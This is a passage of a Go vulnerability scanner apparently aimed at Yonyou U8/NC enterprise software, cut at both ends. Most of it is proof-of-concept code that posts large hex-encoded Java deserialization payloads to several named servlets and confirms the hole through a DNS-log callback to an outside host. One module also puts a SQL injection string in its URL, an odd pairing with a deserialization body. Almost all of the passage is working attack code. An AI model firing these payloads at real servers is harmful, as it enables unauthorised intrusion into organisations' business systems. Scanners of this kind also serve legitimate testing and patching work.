F6465000000000000000000000078707878", hex.EncodeToString([]byte(domain)))))).Post(url)
27 | 	if err != nil {
28 | 		color.Red.Println("[-] 用友 U8 FileTransportServlet反序列化漏洞不存在")
29 | 		return
30 | 	}
31 | 	if dnslog.GetDnslogRecord(session) {
32 | 		color.Green.Println("[+] 用友 U8 FileTransportServlet反序列化漏洞存在 -> " + url)
33 | 		return
34 | 	}
35 | 	color.Red.Println("[-] 用友 U8 FileTransportServlet反序列化漏洞不存在")
36 | }
37 | 


--------------------------------------------------------------------------------
/pkg/POC/FileReceiveServlet-Deser/FileReceiveServlet-Deser.go:
--------------------------------------------------------------------------------
 1 | package FileReceiveServlet_Deser
 2 | 
 3 | import (
 4 | 	"encoding/hex"
 5 | 	"fmt"
 6 | 	"github.com/gookit/color"
 7 | 	"github.com/imroc/req/v3"
 8 | 	"time"
 9 | 	"yongyouScan/pkg/dnslog"
10 | 	"yongyouScan/pkg/utils"
11 | )
12 | 
13 | // https://github.com/Threekiii/Awesome-POC/blob/master/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E7%94%A8%E5%8F%8B%20NC%20FileReceiveServlet%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96RCE%E6%BC%8F%E6%B4%9E.md
14 | 
15 | var (
16 | 	client = req.C().EnableForceHTTP1().EnableDumpEachRequest().SetTimeout(5 * time.Second)
17 | 	UA     = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
18 | )
19 | 
20 | func Run(url string) {
21 | 	domain, session := dnslog.GetDnslogUrl()
22 | 	url = url + "/servlet/FileReceiveServlet"
23 | 	_, err := client.R().SetHeaders(map[string]string{ // Set multiple headers at once
24 | 		"User-Agent": UA,
25 | 	}).SetBody("data=" + utils.InsertBackslashX(fmt.Sprintf("ACED0005737200146A6176612E7574696C2E4C696E6B65644C6973740C29535D4A6088220300007870770400000016737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000C770800000010000000017372000C6A6176612E6E65742E55524C962537361AFCE47203000749000868617368436F6465490004706F72744C0009617574686F726974797400124C6A6176612F6C616E672F537472696E673B4C000466696C6571007E00054C0004686F737471007E00054C000870726F746F636F6C71007E00054C000372656671007E00057870FFFFFFFFFFFFFFFF740014636333316F723332312E%s74000071007E00077400046874747070787672003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063633332322E%s71007E000871007E000E740004687474707078767200336F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E457874656E64656450726F70657274696573243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636334302E%s71007E000871007E00147400046874747070787672003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E66756E63746F72732E436861696E65645472616E73666F726D657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636334312E%s71007E000871007E001A7400046874747070787672002E6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E466C75656E744974657261626C6500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636231372E%s71007E000871007E0020740004687474707078767200376F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4D617070656450726F706572747944657363726970746F72243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063623138782E%s71007E000871007E00267400046874747070787672003A6F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E44796E614265616E4D61704465636F7261746F72244D6170456E74727900000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063623139782E%s71007E000871007E002C740004687474707078767200326F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4265616E496E74726F7370656374696F6E4461746100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012633370303932782E%s71007E000871007E003274000468747470707876720031636F6D2E6D6368616E67652E76322E633370302E696D706C2E506F6F6C4261636B656444617461536F757263654261736500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012633370303935782E%s71007E000871007E00387400046874747070787672002D636F6D2E6D6368616E67652E76322E633370302E746573742E416C776179734661696C44617461536F7572636500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000E616A772E%s71007E000871007E003E7400046874747070787672002A6F72672E6173706563746A2E7765617665722E746F6F6C732E63616368652E53696D706C65436163686500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062342E%s71007E000871007E0044740004687474707078767200176273682E436F6C6C656374696F6E4D616E61676572243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062352E%s71007E000871007E004A7400046874747070787672001A6273682E656E67696E652E427368536372697074456E67696E6500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062362E%s71007E000871007E0050740004687474707078767200236273682E636F6C6C656374696F6E2E436F6C6C656374696F6E4974657261746F72243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001867726F6F7679313730323331312E%s71007E000871007E0056740004687474707078767200356F72672E636F6465686175732E67726F6F76792E7265666C656374696F6E2E436C617373496E666F24436C617373496E666F53657400000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001467726F6F76793234782E%s71007E000871007E005C7400046874747070787672001267726F6F76792E6C616E672E5475706C653200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001467726F6F76793234342E%s71007E000871007E0062740004687474707078767200246F72672E636F6465686175732E67726F6F76792E72756E74696D652E64676D243131373000000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F6265636C2E%s71007E000871007E006874000468747470707876720031636F6D2E73756E2E6F72672E6170616368652E6263656C2E696E7465726E616C2E7574696C2E436C6173734C6F6164657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400124A646B377532312E%s71007E000871007E006E7400046874747070787672002C636F6D2E73756E2E636F7262612E73652E696D706C2E6F72627574696C2E4F5242436C6173734C6F6164657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400124A5245387532302E%s71007E000871007E0074740004687474707078767200426A617661782E7377696E672E706C61662E6D6574616C2E4D6574616C46696C6543686F6F7365725549244469726563746F7279436F6D626F426F784D6F64656C243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400106C696E75782E%s71007E000871007E007A7400046874747070787672002173756E2E6177742E5831312E4177744772617068696373436F6E6669674461746100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001277696E646F77732E%s71007E000871007E00807400046874747070787672001B73756E2E6177742E77696E646F77732E57427574746F6E5065657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400166A61636B736F6E323130302E%s71007E000871007E00867400046874747070787672002C636F6D2E666173746572786D6C2E6A61636B736F6E2E6461746162696E642E6E6F64652E504F4A4F4E6F6465000000000000000000000078707878", hex.EncodeToString([]byte(domain))))).Post(url)
26 | 	if err != nil {
27 | 		color.Red.Println("[-] 用友 FileReceiveServlet反序列化漏洞不存在")
28 | 		return
29 | 	}
30 | 	if dnslog.GetDnslogRecord(session) {
31 | 		color.Green.Println("[+] 用友 FileReceiveServlet反序列化漏洞存在 -> " + url)
32 | 		return
33 | 	}
34 | 	color.Red.Println("[-] 用友 FileReceiveServlet反序列化漏洞不存在")
35 | }
36 | 


--------------------------------------------------------------------------------
/pkg/POC/U8-TaskTreeQuery/U8-TaskTreeQuery.go:
--------------------------------------------------------------------------------
 1 | package U8_TaskTreeQuery
 2 | 
 3 | import (
 4 | 	"encoding/hex"
 5 | 	"fmt"
 6 | 	"github.com/gookit/color"
 7 | 	"github.com/imroc/req/v3"
 8 | 	"time"
 9 | 	"yongyouScan/pkg/dnslog"
10 | 	"yongyouScan/pkg/utils"
11 | )
12 | 
13 | var (
14 | 	client = req.C().EnableForceHTTP1().EnableDumpEachRequest().SetTimeout(5 * time.Second)
15 | 	UA     = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
16 | )
17 | 
18 | func Run(url string) {
19 | 	domain, session := dnslog.GetDnslogUrl()
20 | 	url = url + "/service/~iufo/nc.itf.iufo.mobilereport.task.TaskTreeQuery?usercode=1'+UNION+all+SELECT+1,db_name(),3,4,5,6,7,8,9+from+master..sysdatabases--"
21 | 	_, err := client.R().SetHeaders(map[string]string{ // Set multiple headers at once
22 | 		"User-Agent":     UA,
23 | 		"Content-Length": "20434",
24 | 		"Content-Type":   "application/x-www-form-urlencoded",
25 | 	}).SetBody(fmt.Sprintf("{{unquote(\"%s\")}}", utils.InsertBackslashX(fmt.Sprintf("ACED0005737200146A6176612E7574696C2E4C696E6B65644C6973740C29535D4A6088220300007870770400000016737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000C770800000010000000017372000C6A6176612E6E65742E55524C962537361AFCE47203000749000868617368436F6465490004706F72744C0009617574686F726974797400124C6A6176612F6C616E672F537472696E673B4C000466696C6571007E00054C0004686F737471007E00054C000870726F746F636F6C71007E00054C000372656671007E00057870FFFFFFFFFFFFFFFF740014636333316F723332312E%s74000071007E00077400046874747070787672003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063633332322E%s71007E000871007E000E740004687474707078767200336F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E457874656E64656450726F70657274696573243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636334302E%s71007E000871007E00147400046874747070787672003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E66756E63746F72732E436861696E65645472616E73666F726D657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636334312E%s71007E000871007E001A7400046874747070787672002E6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E466C75656E744974657261626C6500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636231372E%s71007E000871007E0020740004687474707078767200376F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4D617070656450726F706572747944657363726970746F72243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063623138782E%s71007E000871007E00267400046874747070787672003A6F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E44796E614265616E4D61704465636F7261746F72244D6170456E74727900000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063623139782E%s71007E000871007E002C740004687474707078767200326F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4265616E496E74726F7370656374696F6E4461746100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012633370303932782E%s71007E000871007E003274000468747470707876720031636F6D2E6D6368616E67652E76322E633370302E696D706C2E506F6F6C4261636B656444617461536F757263654261736500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012633370303935782E%s71007E000871007E00387400046874747070787672002D636F6D2E6D6368616E67652E76322E633370302E746573742E416C776179734661696C44617461536F7572636500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000E616A772E%s71007E000871007E003E7400046874747070787672002A6F72672E6173706563746A2E7765617665722E746F6F6C732E63616368652E53696D706C65436163686500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062342E%s71007E000871007E0044740004687474707078767200176273682E436F6C6C656374696F6E4D616E61676572243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062352E%s71007E000871007E004A7400046874747070787672001A6273682E656E67696E652E427368536372697074456E67696E6500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062362E%s71007E000871007E0050740004687474707078767200236273682E636F6C6C656374696F6E2E436F6C6C656374696F6E4974657261746F72243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001867726F6F7679313730323331312E%s71007E000871007E0056740004687474707078767200356F72672E636F6465686175732E67726F6F76792E7265666C656374696F6E2E436C617373496E666F24436C617373496E666F53657400000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001467726F6F76793234782E%s71007E000871007E005C7400046874747070787672001267726F6F76792E6C616E672E5475706C653200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001467726F6F76793234342E%s71007E000871007E0062740004687474707078767200246F72672E636F6465686175732E67726F6F76792E72756E74696D652E64676D243131373000000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F6265636C2E%s71007E000871007E006874000468747470707876720031636F6D2E73756E2E6F72672E6170616368652E6263656C2E696E7465726E616C2E7574696C2E436C6173734C6F6164657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400124A646B377532312E%s71007E000871007E006E7400046874747070787672002C636F6D2E73756E2E636F7262612E73652E696D706C2E6F72627574696C2E4F5242436C6173734C6F6164657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400124A5245387532302E%s71007E000871007E0074740004687474707078767200426A617661782E7377696E672E706C61662E6D6574616C2E4D6574616C46696C6543686F6F7365725549244469726563746F7279436F6D626F426F784D6F64656C243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400106C696E75782E%s71007E000871007E007A7400046874747070787672002173756E2E6177742E5831312E4177744772617068696373436F6E6669674461746100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001277696E646F77732E%s71007E000871007E00807400046874747070787672001B73756E2E6177742E77696E646F77732E57427574746F6E5065657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400166A61636B736F6E323130302E%s71007E000871007E00867400046874747070787672002C636F6D2E666173746572786D6C2E6A61636B736F6E2E6461746162696E642E6E6F64652E504F4A4F4E6F6465000000000000000000000078707878", hex.EncodeToString([]byte(domain)))))).Post(url)
26 | 	if err != nil {
27 | 		color.Red.Println("[-] 用友 U8 TaskTreeQuery SQL注入漏洞不存在")
28 | 		return
29 | 	}
30 | 	if dnslog.GetDnslogRecord(session) {
31 | 		color.Green.Println("[+] 用友 U8 TaskTreeQuery SQL注入漏洞存在 -> " + url)
32 | 		return
33 | 	}
34 | 	color.Red.Println("[-] 用友 U8 TaskTreeQuery SQL注入漏洞不存在")
35 | }
36 | 


--------------------------------------------------------------------------------
/pkg/POC/u8-LoggingConfigServlet/u8-LoggingConfigServlet.go:
--------------------------------------------------------------------------------
 1 | package u8_LoggingConfigServlet
 2 | 
 3 | import (
 4 | 	"encoding/hex"
 5 | 	"fmt"
 6 | 	"github.com/gookit/color"
 7 | 	"github.com/imroc/req/v3"
 8 | 	"time"
 9 | 	"yongyouScan/pkg/dnslog"
10 | 	"yongyouScan/pkg/utils"
11 | )
12 | 
13 | var (
14 | 	client = req.C().EnableForceHTTP1().EnableDumpEachRequest().SetTimeout(5 * time.Second)
15 | 	UA     = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
16 | )
17 | 
18 | // https://blog.csdn.net/qq_41904294/article/details/134430713
19 | 
20 | func Run(url string) {
21 | 	domain, session := dnslog.GetDnslogUrl()
22 | 	url = url + "/service/~iufo/nc.bs.logging.config.LoggingConfigServlet"
23 | 	_, err := client.R().SetHeaders(map[string]string{ // Set multiple headers at once
24 | 		"User-Agent":     UA,
25 | 		"Content-Length": "16284",
26 | 		"Content-Type":   "application/x-www-form-urlencoded",
27 | 	}).SetBody(fmt.Sprintf("{{unquote(\"%s\")}}", utils.InsertBackslashX(fmt.Sprintf("ACED0005737200146A6176612E7574696C2E4C696E6B65644C6973740C29535D4A6088220300007870770400000016737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000C770800000010000000017372000C6A6176612E6E65742E55524C962537361AFCE47203000749000868617368436F6465490004706F72744C0009617574686F726974797400124C6A6176612F6C616E672F537472696E673B4C000466696C6571007E00054C0004686F737471007E00054C000870726F746F636F6C71007E00054C000372656671007E00057870FFFFFFFFFFFFFFFF740014636333316F723332312E%s74000071007E00077400046874747070787672003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063633332322E%s71007E000871007E000E740004687474707078767200336F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E457874656E64656450726F70657274696573243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636334302E%s71007E000871007E00147400046874747070787672003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E66756E63746F72732E436861696E65645472616E73666F726D657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636334312E%s71007E000871007E001A7400046874747070787672002E6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E466C75656E744974657261626C6500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636231372E%s71007E000871007E0020740004687474707078767200376F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4D617070656450726F706572747944657363726970746F72243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063623138782E%s71007E000871007E00267400046874747070787672003A6F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E44796E614265616E4D61704465636F7261746F72244D6170456E74727900000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063623139782E%s71007E000871007E002C740004687474707078767200326F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4265616E496E74726F7370656374696F6E4461746100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012633370303932782E%s71007E000871007E003274000468747470707876720031636F6D2E6D6368616E67652E76322E633370302E696D706C2E506F6F6C4261636B656444617461536F757263654261736500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012633370303935782E%s71007E000871007E00387400046874747070787672002D636F6D2E6D6368616E67652E76322E633370302E746573742E416C776179734661696C44617461536F7572636500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000E616A772E%s71007E000871007E003E7400046874747070787672002A6F72672E6173706563746A2E7765617665722E746F6F6C732E63616368652E53696D706C65436163686500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062342E%s71007E000871007E0044740004687474707078767200176273682E436F6C6C656374696F6E4D616E61676572243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062352E%s71007E000871007E004A7400046874747070787672001A6273682E656E67696E652E427368536372697074456E67696E6500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062362E%s71007E000871007E0050740004687474707078767200236273682E636F6C6C656374696F6E2E436F6C6C656374696F6E4974657261746F72243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001867726F6F7679313730323331312E%s71007E000871007E0056740004687474707078767200356F72672E636F6465686175732E67726F6F76792E7265666C656374696F6E2E436C617373496E666F24436C617373496E666F53657400000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001467726F6F76793234782E%s71007E000871007E005C7400046874747070787672001267726F6F76792E6C616E672E5475706C653200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001467726F6F76793234342E%s71007E000871007E0062740004687474707078767200246F72672E636F6465686175732E67726F6F76792E72756E74696D652E64676D243131373000000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F6265636C2E%s71007E000871007E006874000468747470707876720031636F6D2E73756E2E6F72672E6170616368652E6263656C2E696E7465726E616C2E7574696C2E436C6173734C6F6164657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400124A646B377532312E%s71007E000871007E006E7400046874747070787672002C636F6D2E73756E2E636F7262612E73652E696D706C2E6F72627574696C2E4F5242436C6173734C6F6164657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400124A5245387532302E%s71007E000871007E0074740004687474707078767200426A617661782E7377696E672E706C61662E6D6574616C2E4D6574616C46696C6543686F6F7365725549244469726563746F7279436F6D626F426F784D6F64656C243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400106C696E75782E%s71007E000871007E007A7400046874747070787672002173756E2E6177742E5831312E4177744772617068696373436F6E6669674461746100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001277696E646F77732E%s71007E000871007E00807400046874747070787672001B73756E2E6177742E77696E646F77732E57427574746F6E5065657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400166A61636B736F6E323130302E%s71007E000871007E00867400046874747070787672002C636F6D2E666173746572786D6C2E6A61636B736F6E2E6461746162696E642E6E6F64652E504F4A4F4E6F6465000000000000000000000078707878", hex.EncodeToString([]byte(domain)))))).Post(url)
28 | 	if err != nil {
29 | 		color.Red.Println("[-] 用友 U8 LoggingConfigServlet反序列化漏洞不存在")
30 | 		return
31 | 	}
32 | 	if dnslog.GetDnslogRecord(session) {
33 | 		color.Green.Println("[+] 用友 U8 LoggingConfigServlet反序列化漏洞存在 -> " + url)
34 | 		return
35 | 	}
36 | 	color.Red.Println("[-] 用友 U8 LoggingConfigServlet反序列化漏洞不存在")
37 | }
38 | 


--------------------------------------------------------------------------------
/pkg/POC/u8-TableInputOperServlet/u8-TableInputOperServlet.go:
--------------------------------------------------------------------------------
 1 | package u8_TableInputOperServlet
 2 | 
 3 | import (
 4 | 	"encoding/hex"
 5 | 	"fmt"
 6 | 	"github.com/gookit/color"
 7 | 	"github.com/imroc/req/v3"
 8 | 	"time"
 9 | 	"yongyouScan/pkg/dnslog"
10 | 	"yongyouScan/pkg/utils"
11 | )
12 | 
13 | var (
14 | 	client = req.C().EnableForceHTTP1().EnableDumpEachRequest().SetTimeout(5 * time.Second)
15 | 	UA     = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
16 | )
17 | 
18 | // https://blog.csdn.net/qq_41904294/article/details/134430713
19 | 
20 | func Run(url string) {
21 | 	domain, session := dnslog.GetDnslogUrl()
22 | 	url = url + "/service/~iufo/com.ufsoft.iuforeport.tableinput.TableInputOperServlet"
23 | 	_, err := client.R().SetHeaders(map[string]string{ // Set multiple headers at once
24 | 		"User-Agent":     UA,
25 | 		"Content-Length": "20327",
26 | 		"Content-Type":   "application/x-www-form-urlencoded",
27 | 	}).SetBody(fmt.Sprintf("{{unquote(\"%s\")}}", utils.InsertBackslashX(fmt.Sprintf("ACED0005737200146A6176612E7574696C2E4C696E6B65644C6973740C29535D4A6088220300007870770400000016737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000C770800000010000000017372000C6A6176612E6E65742E55524C962537361AFCE47203000749000868617368436F6465490004706F72744C0009617574686F726974797400124C6A6176612F6C616E672F537472696E673B4C000466696C6571007E00054C0004686F737471007E00054C000870726F746F636F6C71007E00054C000372656671007E00057870FFFFFFFFFFFFFFFF740014636333316F723332312E%s74000071007E00077400046874747070787672003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063633332322E%s71007E000871007E000E740004687474707078767200336F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E457874656E64656450726F70657274696573243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636334302E%s71007E000871007E00147400046874747070787672003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E66756E63746F72732E436861696E65645472616E73666F726D657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636334312E%s71007E000871007E001A7400046874747070787672002E6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E466C75656E744974657261626C6500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636231372E%s71007E000871007E0020740004687474707078767200376F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4D617070656450726F706572747944657363726970746F72243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063623138782E%s71007E000871007E00267400046874747070787672003A6F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E44796E614265616E4D61704465636F7261746F72244D6170456E74727900000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063623139782E%s71007E000871007E002C740004687474707078767200326F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4265616E496E74726F7370656374696F6E4461746100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012633370303932782E%s71007E000871007E003274000468747470707876720031636F6D2E6D6368616E67652E76322E633370302E696D706C2E506F6F6C4261636B656444617461536F757263654261736500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012633370303935782E%s71007E000871007E00387400046874747070787672002D636F6D2E6D6368616E67652E76322E633370302E746573742E416C776179734661696C44617461536F7572636500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000E616A772E%s71007E000871007E003E7400046874747070787672002A6F72672E6173706563746A2E7765617665722E746F6F6C732E63616368652E53696D706C65436163686500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062342E%s71007E000871007E0044740004687474707078767200176273682E436F6C6C656374696F6E4D616E61676572243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062352E%s71007E000871007E004A7400046874747070787672001A6273682E656E67696E652E427368536372697074456E67696E6500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062362E%s71007E000871007E0050740004687474707078767200236273682E636F6C6C656374696F6E2E436F6C6C656374696F6E4974657261746F72243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001867726F6F7679313730323331312E%s71007E000871007E0056740004687474707078767200356F72672E636F6465686175732E67726F6F76792E7265666C656374696F6E2E436C617373496E666F24436C617373496E666F53657400000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001467726F6F76793234782E%s71007E000871007E005C7400046874747070787672001267726F6F76792E6C616E672E5475706C653200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001467726F6F76793234342E%s71007E000871007E0062740004687474707078767200246F72672E636F6465686175732E67726F6F76792E72756E74696D652E64676D243131373000000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F6265636C2E%s71007E000871007E006874000468747470707876720031636F6D2E73756E2E6F72672E6170616368652E6263656C2E696E7465726E616C2E7574696C2E436C6173734C6F6164657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400124A646B377532312E%s71007E000871007E006E7400046874747070787672002C636F6D2E73756E2E636F7262612E73652E696D706C2E6F72627574696C2E4F5242436C6173734C6F6164657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400124A5245387532302